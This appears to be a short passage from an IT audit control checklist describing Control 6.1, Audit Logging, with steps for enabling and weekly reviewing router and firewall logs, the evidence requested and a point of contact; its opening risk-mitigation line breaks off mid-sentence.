Risk Mitigation: To ensure that system activities and traffic

Control 6.1 Audit Logging (Daily / Weekly)

Control Description: Router and firewall logging are enabled to monitor and record all activity on the network to ensure security and safety of corporate and personal assets.

Testing Steps:
1. Obtain a copy of the standard.
2. Enable router and firewall logging.
3. If an event is recorded, review logs immediately.
4. Review all logs on a weekly basis.
5. Maintain redundant log copies.

Evidence Requested:
1. Obtain a copy of the standard and procedures.
2. Provide log copies.
3. Maintain a secure log backup.

Point of Contact: Ben
